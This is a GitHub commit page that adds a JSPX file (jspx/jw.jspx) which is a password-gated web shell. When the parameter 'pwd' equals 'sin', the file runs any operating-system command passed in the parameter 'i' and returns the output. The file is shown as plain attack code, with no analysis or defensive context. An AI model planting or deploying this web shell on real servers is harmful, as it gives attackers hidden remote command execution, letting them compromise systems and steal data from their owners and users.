We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 6c708c5 commit 1b499ceCopy full SHA for 1b499ce
jspx/jw.jspx
@@ -0,0 +1,15 @@
1
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
2
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
3
+<jsp:scriptlet>
4
+ if("sin".equals(request.getParameter("pwd"))){
5
+ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
6
+ int a = -1;
7
+ byte[] b = new byte[2048];
8
+ out.print("<pre>");
9
+ while((a=in.read(b))!=-1){
10
+ out.println(new String(b));
11
+ }
12
+ out.print("</pre>");
13
14
+</jsp:scriptlet>
15
+</jsp:root>
0 commit comments